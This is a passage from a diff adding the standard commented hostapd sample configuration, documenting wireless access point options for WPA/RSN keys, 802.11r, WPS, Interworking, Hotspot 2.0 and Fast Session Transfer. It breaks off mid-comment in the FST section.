2323+#wpa_psk_file=/etc/hostapd.wpa_psk 2324+ 2325+# Optionally, WPA passphrase can be received from RADIUS authentication server 2326+# This requires macaddr_acl to be set to 2 (RADIUS) 2327+# 0 = disabled (default) 2328+# 1 = optional; use default passphrase/psk if RADIUS server does not include 2329+# Tunnel-Password 2330+# 2 = required; reject authentication if RADIUS server does not include 2331+# Tunnel-Password 2332+#wpa_psk_radius=0 2333+ 2334+# Set of accepted key management algorithms (WPA-PSK, WPA-EAP, or both). The 2335+# entries are separated with a space. WPA-PSK-SHA256 and WPA-EAP-SHA256 can be 2336+# added to enable SHA256-based stronger algorithms. 2337+# (dot11RSNAConfigAuthenticationSuitesTable) 2338+#wpa_key_mgmt=WPA-PSK WPA-EAP 2339+ 2340+# Set of accepted cipher suites (encryption algorithms) for pairwise keys 2341+# (unicast packets). This is a space separated list of algorithms: 2342+# CCMP = AES in Counter mode with CBC-MAC [RFC 3610, IEEE 802.11i/D7.0] 2343+# TKIP = Temporal Key Integrity Protocol [IEEE 802.11i/D7.0] 2344+# Group cipher suite (encryption algorithm for broadcast and multicast frames) 2345+# is automatically selected based on this configuration. If only CCMP is 2346+# allowed as the pairwise cipher, group cipher will also be CCMP. Otherwise, 2347+# TKIP will be used as the group cipher. 2348+# (dot11RSNAConfigPairwiseCiphersTable) 2349+# Pairwise cipher for WPA (v1) (default: TKIP) 2350+#wpa_pairwise=TKIP CCMP 2351+# Pairwise cipher for RSN/WPA2 (default: use wpa_pairwise value) 2352+#rsn_pairwise=CCMP 2353+ 2354+# Time interval for rekeying GTK (broadcast/multicast encryption keys) in 2355+# seconds. (dot11RSNAConfigGroupRekeyTime) 2356+#wpa_group_rekey=600 2357+ 2358+# Rekey GTK when any STA that possesses the current GTK is leaving the BSS. 2359+# (dot11RSNAConfigGroupRekeyStrict) 2360+#wpa_strict_rekey=1 2361+ 2362+# Time interval for rekeying GMK (master key used internally to generate GTKs 2363+# (in seconds). 2364+#wpa_gmk_rekey=86400 2365+ 2366+# Maximum lifetime for PTK in seconds. This can be used to enforce rekeying of 2367+# PTK to mitigate some attacks against TKIP deficiencies. 2368+#wpa_ptk_rekey=600 2369+ 2370+# Enable IEEE 802.11i/RSN/WPA2 pre-authentication. This is used to speed up 2371+# roaming be pre-authenticating IEEE 802.1X/EAP part of the full RSN 2372+# authentication and key handshake before actually associating with a new AP. 2373+# (dot11RSNAPreauthenticationEnabled) 2374+#rsn_preauth=1 2375+# 2376+# Space separated list of interfaces from which pre-authentication frames are 2377+# accepted (e.g., 'eth0' or 'eth0 wlan0wds0'. This list should include all 2378+# interface that are used for connections to other APs. This could include 2379+# wired interfaces and WDS links. The normal wireless data interface towards 2380+# associated stations (e.g., wlan0) should not be added, since 2381+# pre-authentication is only used with APs other than the currently associated 2382+# one. 2383+#rsn_preauth_interfaces=eth0 2384+ 2385+# peerkey: Whether PeerKey negotiation for direct links (IEEE 802.11e) is 2386+# allowed. This is only used with RSN/WPA2. 2387+# 0 = disabled (default) 2388+# 1 = enabled 2389+#peerkey=1 2390+ 2391+# ieee80211w: Whether management frame protection (MFP) is enabled 2392+# 0 = disabled (default) 2393+# 1 = optional 2394+# 2 = required 2395+#ieee80211w=0 2396+ 2397+# Group management cipher suite 2398+# Default: AES-128-CMAC (BIP) 2399+# Other options (depending on driver support): 2400+# BIP-GMAC-128 2401+# BIP-GMAC-256 2402+# BIP-CMAC-256 2403+# Note: All the stations connecting to the BSS will also need to support the 2404+# selected cipher. The default AES-128-CMAC is the only option that is commonly 2405+# available in deployed devices. 2406+#group_mgmt_cipher=AES-128-CMAC 2407+ 2408+# Association SA Query maximum timeout (in TU = 1.024 ms; for MFP) 2409+# (maximum time to wait for a SA Query response) 2410+# dot11AssociationSAQueryMaximumTimeout, 1...4294967295 2411+#assoc_sa_query_max_timeout=1000 2412+ 2413+# Association SA Query retry timeout (in TU = 1.024 ms; for MFP) 2414+# (time between two subsequent SA Query requests) 2415+# dot11AssociationSAQueryRetryTimeout, 1...4294967295 2416+#assoc_sa_query_retry_timeout=201 2417+ 2418+# disable_pmksa_caching: Disable PMKSA caching 2419+# This parameter can be used to disable caching of PMKSA created through EAP 2420+# authentication. RSN preauthentication may still end up using PMKSA caching if 2421+# it is enabled (rsn_preauth=1). 2422+# 0 = PMKSA caching enabled (default) 2423+# 1 = PMKSA caching disabled 2424+#disable_pmksa_caching=0 2425+ 2426+# okc: Opportunistic Key Caching (aka Proactive Key Caching) 2427+# Allow PMK cache to be shared opportunistically among configured interfaces 2428+# and BSSes (i.e., all configurations within a single hostapd process). 2429+# 0 = disabled (default) 2430+# 1 = enabled 2431+#okc=1 2432+ 2433+# SAE threshold for anti-clogging mechanism (dot11RSNASAEAntiCloggingThreshold) 2434+# This parameter defines how many open SAE instances can be in progress at the 2435+# same time before the anti-clogging mechanism is taken into use. 2436+#sae_anti_clogging_threshold=5 2437+ 2438+# Enabled SAE finite cyclic groups 2439+# SAE implementation are required to support group 19 (ECC group defined over a 2440+# 256-bit prime order field). All groups that are supported by the 2441+# implementation are enabled by default. This configuration parameter can be 2442+# used to specify a limited set of allowed groups. The group values are listed 2443+# in the IANA registry: 2444+# http://www.iana.org/assignments/ipsec-registry/ipsec-registry.xml#ipsec-registry-9 2445+#sae_groups=19 20 21 25 26 2446+ 2447+##### IEEE 802.11r configuration ############################################## 2448+ 2449+# Mobility Domain identifier (dot11FTMobilityDomainID, MDID) 2450+# MDID is used to indicate a group of APs (within an ESS, i.e., sharing the 2451+# same SSID) between which a STA can use Fast BSS Transition. 2452+# 2-octet identifier as a hex string. 2453+#mobility_domain=a1b2 2454+ 2455+# PMK-R0 Key Holder identifier (dot11FTR0KeyHolderID) 2456+# 1 to 48 octet identifier. 2457+# This is configured with nas_identifier (see RADIUS client section above). 2458+ 2459+# Default lifetime of the PMK-RO in minutes; range 1..65535 2460+# (dot11FTR0KeyLifetime) 2461+#r0_key_lifetime=10000 2462+ 2463+# PMK-R1 Key Holder identifier (dot11FTR1KeyHolderID) 2464+# 6-octet identifier as a hex string. 2465+# Defaults to BSSID. 2466+#r1_key_holder=000102030405 2467+ 2468+# Reassociation deadline in time units (TUs / 1.024 ms; range 1000..65535) 2469+# (dot11FTReassociationDeadline) 2470+#reassociation_deadline=1000 2471+ 2472+# List of R0KHs in the same Mobility Domain 2473+# format: <MAC address> <NAS Identifier> <128-bit key as hex string> 2474+# This list is used to map R0KH-ID (NAS Identifier) to a destination MAC 2475+# address when requesting PMK-R1 key from the R0KH that the STA used during the 2476+# Initial Mobility Domain Association. 2477+#r0kh=02:01:02:03:04:05 r0kh-1.example.com 000102030405060708090a0b0c0d0e0f 2478+#r0kh=02:01:02:03:04:06 r0kh-2.example.com 00112233445566778899aabbccddeeff 2479+# And so on.. One line per R0KH. 2480+ 2481+# List of R1KHs in the same Mobility Domain 2482+# format: <MAC address> <R1KH-ID> <128-bit key as hex string> 2483+# This list is used to map R1KH-ID to a destination MAC address when sending 2484+# PMK-R1 key from the R0KH. This is also the list of authorized R1KHs in the MD 2485+# that can request PMK-R1 keys. 2486+#r1kh=02:01:02:03:04:05 02:11:22:33:44:55 000102030405060708090a0b0c0d0e0f 2487+#r1kh=02:01:02:03:04:06 02:11:22:33:44:66 00112233445566778899aabbccddeeff 2488+# And so on.. One line per R1KH. 2489+ 2490+# Whether PMK-R1 push is enabled at R0KH 2491+# 0 = do not push PMK-R1 to all configured R1KHs (default) 2492+# 1 = push PMK-R1 to all configured R1KHs whenever a new PMK-R0 is derived 2493+#pmk_r1_push=1 2494+ 2495+# Whether to enable FT-over-DS 2496+# 0 = FT-over-DS disabled 2497+# 1 = FT-over-DS enabled (default) 2498+#ft_over_ds=1 2499+ 2500+##### Neighbor table ########################################################## 2501+# Maximum number of entries kept in AP table (either for neigbor table or for 2502+# detecting Overlapping Legacy BSS Condition). The oldest entry will be 2503+# removed when adding a new entry that would make the list grow over this 2504+# limit. Note! WFA certification for IEEE 802.11g requires that OLBC is 2505+# enabled, so this field should not be set to 0 when using IEEE 802.11g. 2506+# default: 255 2507+#ap_table_max_size=255 2508+ 2509+# Number of seconds of no frames received after which entries may be deleted 2510+# from the AP table. Since passive scanning is not usually performed frequently 2511+# this should not be set to very small value. In addition, there is no 2512+# guarantee that every scan cycle will receive beacon frames from the 2513+# neighboring APs. 2514+# default: 60 2515+#ap_table_expiration_time=3600 2516+ 2517+# Maximum number of stations to track on the operating channel 2518+# This can be used to detect dualband capable stations before they have 2519+# associated, e.g., to provide guidance on which colocated BSS to use. 2520+# Default: 0 (disabled) 2521+#track_sta_max_num=100 2522+ 2523+# Maximum age of a station tracking entry in seconds 2524+# Default: 180 2525+#track_sta_max_age=180 2526+ 2527+# Do not reply to group-addressed Probe Request from a station that was seen on 2528+# another radio. 2529+# Default: Disabled 2530+# 2531+# This can be used with enabled track_sta_max_num configuration on another 2532+# interface controlled by the same hostapd process to restrict Probe Request 2533+# frame handling from replying to group-addressed Probe Request frames from a 2534+# station that has been detected to be capable of operating on another band, 2535+# e.g., to try to reduce likelihood of the station selecting a 2.4 GHz BSS when 2536+# the AP operates both a 2.4 GHz and 5 GHz BSS concurrently. 2537+# 2538+# Note: Enabling this can cause connectivity issues and increase latency for 2539+# discovering the AP. 2540+#no_probe_resp_if_seen_on=wlan1 2541+ 2542+# Reject authentication from a station that was seen on another radio. 2543+# Default: Disabled 2544+# 2545+# This can be used with enabled track_sta_max_num configuration on another 2546+# interface controlled by the same hostapd process to reject authentication 2547+# attempts from a station that has been detected to be capable of operating on 2548+# another band, e.g., to try to reduce likelihood of the station selecting a 2549+# 2.4 GHz BSS when the AP operates both a 2.4 GHz and 5 GHz BSS concurrently. 2550+# 2551+# Note: Enabling this can cause connectivity issues and increase latency for 2552+# connecting with the AP. 2553+#no_auth_if_seen_on=wlan1 2554+ 2555+##### Wi-Fi Protected Setup (WPS) ############################################# 2556+ 2557+# WPS state 2558+# 0 = WPS disabled (default) 2559+# 1 = WPS enabled, not configured 2560+# 2 = WPS enabled, configured 2561+#wps_state=2 2562+ 2563+# Whether to manage this interface independently from other WPS interfaces 2564+# By default, a single hostapd process applies WPS operations to all configured 2565+# interfaces. This parameter can be used to disable that behavior for a subset 2566+# of interfaces. If this is set to non-zero for an interface, WPS commands 2567+# issued on that interface do not apply to other interfaces and WPS operations 2568+# performed on other interfaces do not affect this interface. 2569+#wps_independent=0 2570+ 2571+# AP can be configured into a locked state where new WPS Registrar are not 2572+# accepted, but previously authorized Registrars (including the internal one) 2573+# can continue to add new Enrollees. 2574+#ap_setup_locked=1 2575+ 2576+# Universally Unique IDentifier (UUID; see RFC 4122) of the device 2577+# This value is used as the UUID for the internal WPS Registrar. If the AP 2578+# is also using UPnP, this value should be set to the device's UPnP UUID. 2579+# If not configured, UUID will be generated based on the local MAC address. 2580+#uuid=12345678-9abc-def0-1234-56789abcdef0 2581+ 2582+# Note: If wpa_psk_file is set, WPS is used to generate random, per-device PSKs 2583+# that will be appended to the wpa_psk_file. If wpa_psk_file is not set, the 2584+# default PSK (wpa_psk/wpa_passphrase) will be delivered to Enrollees. Use of 2585+# per-device PSKs is recommended as the more secure option (i.e., make sure to 2586+# set wpa_psk_file when using WPS with WPA-PSK). 2587+ 2588+# When an Enrollee requests access to the network with PIN method, the Enrollee 2589+# PIN will need to be entered for the Registrar. PIN request notifications are 2590+# sent to hostapd ctrl_iface monitor. In addition, they can be written to a 2591+# text file that could be used, e.g., to populate the AP administration UI with 2592+# pending PIN requests. If the following variable is set, the PIN requests will 2593+# be written to the configured file. 2594+#wps_pin_requests=/var/run/hostapd_wps_pin_requests 2595+ 2596+# Device Name 2597+# User-friendly description of device; up to 32 octets encoded in UTF-8 2598+#device_name=Wireless AP 2599+ 2600+# Manufacturer 2601+# The manufacturer of the device (up to 64 ASCII characters) 2602+#manufacturer=Company 2603+ 2604+# Model Name 2605+# Model of the device (up to 32 ASCII characters) 2606+#model_name=WAP 2607+ 2608+# Model Number 2609+# Additional device description (up to 32 ASCII characters) 2610+#model_number=123 2611+ 2612+# Serial Number 2613+# Serial number of the device (up to 32 characters) 2614+#serial_number=12345 2615+ 2616+# Primary Device Type 2617+# Used format: <categ>-<OUI>-<subcateg> 2618+# categ = Category as an integer value 2619+# OUI = OUI and type octet as a 4-octet hex-encoded value; 0050F204 for 2620+# default WPS OUI 2621+# subcateg = OUI-specific Sub Category as an integer value 2622+# Examples: 2623+# 1-0050F204-1 (Computer / PC) 2624+# 1-0050F204-2 (Computer / Server) 2625+# 5-0050F204-1 (Storage / NAS) 2626+# 6-0050F204-1 (Network Infrastructure / AP) 2627+#device_type=6-0050F204-1 2628+ 2629+# OS Version 2630+# 4-octet operating system version number (hex string) 2631+#os_version=01020300 2632+ 2633+# Config Methods 2634+# List of the supported configuration methods 2635+# Available methods: usba ethernet label display ext_nfc_token int_nfc_token 2636+# nfc_interface push_button keypad virtual_display physical_display 2637+# virtual_push_button physical_push_button 2638+#config_methods=label virtual_display virtual_push_button keypad 2639+ 2640+# WPS capability discovery workaround for PBC with Windows 7 2641+# Windows 7 uses incorrect way of figuring out AP's WPS capabilities by acting 2642+# as a Registrar and using M1 from the AP. The config methods attribute in that 2643+# message is supposed to indicate only the configuration method supported by 2644+# the AP in Enrollee role, i.e., to add an external Registrar. For that case, 2645+# PBC shall not be used and as such, the PushButton config method is removed 2646+# from M1 by default. If pbc_in_m1=1 is included in the configuration file, 2647+# the PushButton config method is left in M1 (if included in config_methods 2648+# parameter) to allow Windows 7 to use PBC instead of PIN (e.g., from a label 2649+# in the AP). 2650+#pbc_in_m1=1 2651+ 2652+# Static access point PIN for initial configuration and adding Registrars 2653+# If not set, hostapd will not allow external WPS Registrars to control the 2654+# access point. The AP PIN can also be set at runtime with hostapd_cli 2655+# wps_ap_pin command. Use of temporary (enabled by user action) and random 2656+# AP PIN is much more secure than configuring a static AP PIN here. As such, 2657+# use of the ap_pin parameter is not recommended if the AP device has means for 2658+# displaying a random PIN. 2659+#ap_pin=12345670 2660+ 2661+# Skip building of automatic WPS credential 2662+# This can be used to allow the automatically generated Credential attribute to 2663+# be replaced with pre-configured Credential(s). 2664+#skip_cred_build=1 2665+ 2666+# Additional Credential attribute(s) 2667+# This option can be used to add pre-configured Credential attributes into M8 2668+# message when acting as a Registrar. If skip_cred_build=1, this data will also 2669+# be able to override the Credential attribute that would have otherwise been 2670+# automatically generated based on network configuration. This configuration 2671+# option points to an external file that much contain the WPS Credential 2672+# attribute(s) as binary data. 2673+#extra_cred=hostapd.cred 2674+ 2675+# Credential processing 2676+# 0 = process received credentials internally (default) 2677+# 1 = do not process received credentials; just pass them over ctrl_iface to 2678+# external program(s) 2679+# 2 = process received credentials internally and pass them over ctrl_iface 2680+# to external program(s) 2681+# Note: With wps_cred_processing=1, skip_cred_build should be set to 1 and 2682+# extra_cred be used to provide the Credential data for Enrollees. 2683+# 2684+# wps_cred_processing=1 will disabled automatic updates of hostapd.conf file 2685+# both for Credential processing and for marking AP Setup Locked based on 2686+# validation failures of AP PIN. An external program is responsible on updating 2687+# the configuration appropriately in this case. 2688+#wps_cred_processing=0 2689+ 2690+# AP Settings Attributes for M7 2691+# By default, hostapd generates the AP Settings Attributes for M7 based on the 2692+# current configuration. It is possible to override this by providing a file 2693+# with pre-configured attributes. This is similar to extra_cred file format, 2694+# but the AP Settings attributes are not encapsulated in a Credential 2695+# attribute. 2696+#ap_settings=hostapd.ap_settings 2697+ 2698+# WPS UPnP interface 2699+# If set, support for external Registrars is enabled. 2700+#upnp_iface=br0 2701+ 2702+# Friendly Name (required for UPnP) 2703+# Short description for end use. Should be less than 64 characters. 2704+#friendly_name=WPS Access Point 2705+ 2706+# Manufacturer URL (optional for UPnP) 2707+#manufacturer_url=http://www.example.com/ 2708+ 2709+# Model Description (recommended for UPnP) 2710+# Long description for end user. Should be less than 128 characters. 2711+#model_description=Wireless Access Point 2712+ 2713+# Model URL (optional for UPnP) 2714+#model_url=http://www.example.com/model/ 2715+ 2716+# Universal Product Code (optional for UPnP) 2717+# 12-digit, all-numeric code that identifies the consumer package. 2718+#upc=123456789012 2719+ 2720+# WPS RF Bands (a = 5G, b = 2.4G, g = 2.4G, ag = dual band, ad = 60 GHz) 2721+# This value should be set according to RF band(s) supported by the AP if 2722+# hw_mode is not set. For dual band dual concurrent devices, this needs to be 2723+# set to ag to allow both RF bands to be advertized. 2724+#wps_rf_bands=ag 2725+ 2726+# NFC password token for WPS 2727+# These parameters can be used to configure a fixed NFC password token for the 2728+# AP. This can be generated, e.g., with nfc_pw_token from wpa_supplicant. When 2729+# these parameters are used, the AP is assumed to be deployed with a NFC tag 2730+# that includes the matching NFC password token (e.g., written based on the 2731+# NDEF record from nfc_pw_token). 2732+# 2733+#wps_nfc_dev_pw_id: Device Password ID (16..65535) 2734+#wps_nfc_dh_pubkey: Hexdump of DH Public Key 2735+#wps_nfc_dh_privkey: Hexdump of DH Private Key 2736+#wps_nfc_dev_pw: Hexdump of Device Password 2737+ 2738+##### Wi-Fi Direct (P2P) ###################################################### 2739+ 2740+# Enable P2P Device management 2741+#manage_p2p=1 2742+ 2743+# Allow cross connection 2744+#allow_cross_connection=1 2745+ 2746+#### TDLS (IEEE 802.11z-2010) ################################################# 2747+ 2748+# Prohibit use of TDLS in this BSS 2749+#tdls_prohibit=1 2750+ 2751+# Prohibit use of TDLS Channel Switching in this BSS 2752+#tdls_prohibit_chan_switch=1 2753+ 2754+##### IEEE 802.11v-2011 ####################################################### 2755+ 2756+# Time advertisement 2757+# 0 = disabled (default) 2758+# 2 = UTC time at which the TSF timer is 0 2759+#time_advertisement=2 2760+ 2761+# Local time zone as specified in 8.3 of IEEE Std 1003.1-2004: 2762+# stdoffset[dst[offset][,start[/time],end[/time]]] 2763+#time_zone=EST5 2764+ 2765+# WNM-Sleep Mode (extended sleep mode for stations) 2766+# 0 = disabled (default) 2767+# 1 = enabled (allow stations to use WNM-Sleep Mode) 2768+#wnm_sleep_mode=1 2769+ 2770+# BSS Transition Management 2771+# 0 = disabled (default) 2772+# 1 = enabled 2773+#bss_transition=1 2774+ 2775+# Proxy ARP 2776+# 0 = disabled (default) 2777+# 1 = enabled 2778+#proxy_arp=1 2779+ 2780+# IPv6 Neighbor Advertisement multicast-to-unicast conversion 2781+# This can be used with Proxy ARP to allow multicast NAs to be forwarded to 2782+# associated STAs using link layer unicast delivery. 2783+# 0 = disabled (default) 2784+# 1 = enabled 2785+#na_mcast_to_ucast=0 2786+ 2787+##### IEEE 802.11u-2011 ####################################################### 2788+ 2789+# Enable Interworking service 2790+#interworking=1 2791+ 2792+# Access Network Type 2793+# 0 = Private network 2794+# 1 = Private network with guest access 2795+# 2 = Chargeable public network 2796+# 3 = Free public network 2797+# 4 = Personal device network 2798+# 5 = Emergency services only network 2799+# 14 = Test or experimental 2800+# 15 = Wildcard 2801+#access_network_type=0 2802+ 2803+# Whether the network provides connectivity to the Internet 2804+# 0 = Unspecified 2805+# 1 = Network provides connectivity to the Internet 2806+#internet=1 2807+ 2808+# Additional Step Required for Access 2809+# Note: This is only used with open network, i.e., ASRA shall ne set to 0 if 2810+# RSN is used. 2811+#asra=0 2812+ 2813+# Emergency services reachable 2814+#esr=0 2815+ 2816+# Unauthenticated emergency service accessible 2817+#uesa=0 2818+ 2819+# Venue Info (optional) 2820+# The available values are defined in IEEE Std 802.11u-2011, 7.3.1.34. 2821+# Example values (group,type): 2822+# 0,0 = Unspecified 2823+# 1,7 = Convention Center 2824+# 1,13 = Coffee Shop 2825+# 2,0 = Unspecified Business 2826+# 7,1 Private Residence 2827+#venue_group=7 2828+#venue_type=1 2829+ 2830+# Homogeneous ESS identifier (optional; dot11HESSID) 2831+# If set, this shall be identifical to one of the BSSIDs in the homogeneous 2832+# ESS and this shall be set to the same value across all BSSs in homogeneous 2833+# ESS. 2834+#hessid=02:03:04:05:06:07 2835+ 2836+# Roaming Consortium List 2837+# Arbitrary number of Roaming Consortium OIs can be configured with each line 2838+# adding a new OI to the list. The first three entries are available through 2839+# Beacon and Probe Response frames. Any additional entry will be available only 2840+# through ANQP queries. Each OI is between 3 and 15 octets and is configured as 2841+# a hexstring. 2842+#roaming_consortium=021122 2843+#roaming_consortium=2233445566 2844+ 2845+# Venue Name information 2846+# This parameter can be used to configure one or more Venue Name Duples for 2847+# Venue Name ANQP information. Each entry has a two or three character language 2848+# code (ISO-639) separated by colon from the venue name string. 2849+# Note that venue_group and venue_type have to be set for Venue Name 2850+# information to be complete. 2851+#venue_name=eng:Example venue 2852+#venue_name=fin:Esimerkkipaikka 2853+# Alternative format for language:value strings: 2854+# (double quoted string, printf-escaped string) 2855+#venue_name=P"eng:Example\nvenue" 2856+ 2857+# Network Authentication Type 2858+# This parameter indicates what type of network authentication is used in the 2859+# network. 2860+# format: <network auth type indicator (1-octet hex str)> [redirect URL] 2861+# Network Authentication Type Indicator values: 2862+# 00 = Acceptance of terms and conditions 2863+# 01 = On-line enrollment supported 2864+# 02 = http/https redirection 2865+# 03 = DNS redirection 2866+#network_auth_type=00 2867+#network_auth_type=02http://www.example.com/redirect/me/here/ 2868+ 2869+# IP Address Type Availability 2870+# format: <1-octet encoded value as hex str> 2871+# (ipv4_type & 0x3f) << 2 | (ipv6_type & 0x3) 2872+# ipv4_type: 2873+# 0 = Address type not available 2874+# 1 = Public IPv4 address available 2875+# 2 = Port-restricted IPv4 address available 2876+# 3 = Single NATed private IPv4 address available 2877+# 4 = Double NATed private IPv4 address available 2878+# 5 = Port-restricted IPv4 address and single NATed IPv4 address available 2879+# 6 = Port-restricted IPv4 address and double NATed IPv4 address available 2880+# 7 = Availability of the address type is not known 2881+# ipv6_type: 2882+# 0 = Address type not available 2883+# 1 = Address type available 2884+# 2 = Availability of the address type not known 2885+#ipaddr_type_availability=14 2886+ 2887+# Domain Name 2888+# format: <variable-octet str>[,<variable-octet str>] 2889+#domain_name=example.com,another.example.com,yet-another.example.com 2890+ 2891+# 3GPP Cellular Network information 2892+# format: <MCC1,MNC1>[;<MCC2,MNC2>][;...] 2893+#anqp_3gpp_cell_net=244,91;310,026;234,56 2894+ 2895+# NAI Realm information 2896+# One or more realm can be advertised. Each nai_realm line adds a new realm to 2897+# the set. These parameters provide information for stations using Interworking 2898+# network selection to allow automatic connection to a network based on 2899+# credentials. 2900+# format: <encoding>,<NAI Realm(s)>[,<EAP Method 1>][,<EAP Method 2>][,...] 2901+# encoding: 2902+# 0 = Realm formatted in accordance with IETF RFC 4282 2903+# 1 = UTF-8 formatted character string that is not formatted in 2904+# accordance with IETF RFC 4282 2905+# NAI Realm(s): Semi-colon delimited NAI Realm(s) 2906+# EAP Method: <EAP Method>[:<[AuthParam1:Val1]>][<[AuthParam2:Val2]>][...] 2907+# EAP Method types, see: 2908+# http://www.iana.org/assignments/eap-numbers/eap-numbers.xhtml#eap-numbers-4 2909+# AuthParam (Table 8-188 in IEEE Std 802.11-2012): 2910+# ID 2 = Non-EAP Inner Authentication Type 2911+# 1 = PAP, 2 = CHAP, 3 = MSCHAP, 4 = MSCHAPV2 2912+# ID 3 = Inner authentication EAP Method Type 2913+# ID 5 = Credential Type 2914+# 1 = SIM, 2 = USIM, 3 = NFC Secure Element, 4 = Hardware Token, 2915+# 5 = Softoken, 6 = Certificate, 7 = username/password, 9 = Anonymous, 2916+# 10 = Vendor Specific 2917+#nai_realm=0,example.com;example.net 2918+# EAP methods EAP-TLS with certificate and EAP-TTLS/MSCHAPv2 with 2919+# username/password 2920+#nai_realm=0,example.org,13[5:6],21[2:4][5:7] 2921+ 2922+# Arbitrary ANQP-element configuration 2923+# Additional ANQP-elements with arbitrary values can be defined by specifying 2924+# their contents in raw format as a hexdump of the payload. Note that these 2925+# values will override ANQP-element contents that may have been specified in the 2926+# more higher layer configuration parameters listed above. 2927+# format: anqp_elem=<InfoID>:<hexdump of payload> 2928+# For example, AP Geospatial Location ANQP-element with unknown location: 2929+#anqp_elem=265:0000 2930+# For example, AP Civic Location ANQP-element with unknown location: 2931+#anqp_elem=266:000000 2932+ 2933+# GAS Address 3 behavior 2934+# 0 = P2P specification (Address3 = AP BSSID) workaround enabled by default 2935+# based on GAS request Address3 2936+# 1 = IEEE 802.11 standard compliant regardless of GAS request Address3 2937+# 2 = Force non-compliant behavior (Address3 = AP BSSID for all cases) 2938+#gas_address3=0 2939+ 2940+# QoS Map Set configuration 2941+# 2942+# Comma delimited QoS Map Set in decimal values 2943+# (see IEEE Std 802.11-2012, 8.4.2.97) 2944+# 2945+# format: 2946+# [<DSCP Exceptions[DSCP,UP]>,]<UP 0 range[low,high]>,...<UP 7 range[low,high]> 2947+# 2948+# There can be up to 21 optional DSCP Exceptions which are pairs of DSCP Value 2949+# (0..63 or 255) and User Priority (0..7). This is followed by eight DSCP Range 2950+# descriptions with DSCP Low Value and DSCP High Value pairs (0..63 or 255) for 2951+# each UP starting from 0. If both low and high value are set to 255, the 2952+# corresponding UP is not used. 2953+# 2954+# default: not set 2955+#qos_map_set=53,2,22,6,8,15,0,7,255,255,16,31,32,39,255,255,40,47,255,255 2956+ 2957+##### Hotspot 2.0 ############################################################# 2958+ 2959+# Enable Hotspot 2.0 support 2960+#hs20=1 2961+ 2962+# Disable Downstream Group-Addressed Forwarding (DGAF) 2963+# This can be used to configure a network where no group-addressed frames are 2964+# allowed. The AP will not forward any group-address frames to the stations and 2965+# random GTKs are issued for each station to prevent associated stations from 2966+# forging such frames to other stations in the BSS. 2967+#disable_dgaf=1 2968+ 2969+# OSU Server-Only Authenticated L2 Encryption Network 2970+#osen=1 2971+ 2972+# ANQP Domain ID (0..65535) 2973+# An identifier for a set of APs in an ESS that share the same common ANQP 2974+# information. 0 = Some of the ANQP information is unique to this AP (default). 2975+#anqp_domain_id=1234 2976+ 2977+# Deauthentication request timeout 2978+# If the RADIUS server indicates that the station is not allowed to connect to 2979+# the BSS/ESS, the AP can allow the station some time to download a 2980+# notification page (URL included in the message). This parameter sets that 2981+# timeout in seconds. 2982+#hs20_deauth_req_timeout=60 2983+ 2984+# Operator Friendly Name 2985+# This parameter can be used to configure one or more Operator Friendly Name 2986+# Duples. Each entry has a two or three character language code (ISO-639) 2987+# separated by colon from the operator friendly name string. 2988+#hs20_oper_friendly_name=eng:Example operator 2989+#hs20_oper_friendly_name=fin:Esimerkkioperaattori 2990+ 2991+# Connection Capability 2992+# This can be used to advertise what type of IP traffic can be sent through the 2993+# hotspot (e.g., due to firewall allowing/blocking protocols/ports). 2994+# format: <IP Protocol>:<Port Number>:<Status> 2995+# IP Protocol: 1 = ICMP, 6 = TCP, 17 = UDP 2996+# Port Number: 0..65535 2997+# Status: 0 = Closed, 1 = Open, 2 = Unknown 2998+# Each hs20_conn_capab line is added to the list of advertised tuples. 2999+#hs20_conn_capab=1:0:2 3000+#hs20_conn_capab=6:22:1 3001+#hs20_conn_capab=17:5060:0 3002+ 3003+# WAN Metrics 3004+# format: <WAN Info>:<DL Speed>:<UL Speed>:<DL Load>:<UL Load>:<LMD> 3005+# WAN Info: B0-B1: Link Status, B2: Symmetric Link, B3: At Capabity 3006+# (encoded as two hex digits) 3007+# Link Status: 1 = Link up, 2 = Link down, 3 = Link in test state 3008+# Downlink Speed: Estimate of WAN backhaul link current downlink speed in kbps; 3009+# 1..4294967295; 0 = unknown 3010+# Uplink Speed: Estimate of WAN backhaul link current uplink speed in kbps 3011+# 1..4294967295; 0 = unknown 3012+# Downlink Load: Current load of downlink WAN connection (scaled to 255 = 100%) 3013+# Uplink Load: Current load of uplink WAN connection (scaled to 255 = 100%) 3014+# Load Measurement Duration: Duration for measuring downlink/uplink load in 3015+# tenths of a second (1..65535); 0 if load cannot be determined 3016+#hs20_wan_metrics=01:8000:1000:80:240:3000 3017+ 3018+# Operating Class Indication 3019+# List of operating classes the BSSes in this ESS use. The Global operating 3020+# classes in Table E-4 of IEEE Std 802.11-2012 Annex E define the values that 3021+# can be used in this. 3022+# format: hexdump of operating class octets 3023+# for example, operating classes 81 (2.4 GHz channels 1-13) and 115 (5 GHz 3024+# channels 36-48): 3025+#hs20_operating_class=5173 3026+ 3027+# OSU icons 3028+# <Icon Width>:<Icon Height>:<Language code>:<Icon Type>:<Name>:<file path> 3029+#hs20_icon=32:32:eng:image/png:icon32:/tmp/icon32.png 3030+#hs20_icon=64:64:eng:image/png:icon64:/tmp/icon64.png 3031+ 3032+# OSU SSID (see ssid2 for format description) 3033+# This is the SSID used for all OSU connections to all the listed OSU Providers. 3034+#osu_ssid="example" 3035+ 3036+# OSU Providers 3037+# One or more sets of following parameter. Each OSU provider is started by the 3038+# mandatory osu_server_uri item. The other parameters add information for the 3039+# last added OSU provider. 3040+# 3041+#osu_server_uri=https://example.com/osu/ 3042+#osu_friendly_name=eng:Example operator 3043+#osu_friendly_name=fin:Esimerkkipalveluntarjoaja 3044+#osu_nai=anonymous@example.com 3045+#osu_method_list=1 0 3046+#osu_icon=icon32 3047+#osu_icon=icon64 3048+#osu_service_desc=eng:Example services 3049+#osu_service_desc=fin:Esimerkkipalveluja 3050+# 3051+#osu_server_uri=... 3052+ 3053+##### Fast Session Transfer (FST) support ##################################### 3054+# 3055+# The options in this section are only available when the build configuration 3056+# option CONFIG_FST is set while compiling hostapd. They allow this interface 3057+# to be a part of FST setup. 3058+# 3059+# FST is the transfer of a session from a channel to another channel, in the 3060+# same or different frequency bands. 3061+# 3062+# For detals, see IEEE Std 802.11ad-2012. 3063+ 3064+# Identifier of an FST Group the interface belongs to. 3065+#fst_group_id=bond0 3066+ 3067+# Interface priority within the FST Group. 3068+# Announcing a higher priority for an interface means declaring it more 3069+# preferable for FST switch. 3070+# fst_priority is in 1..255 range with 1 being the lowest priority. 3071+#fst_priority=100 3072+ 3073+# Default LLT value for this interface in milliseconds. The value used in case 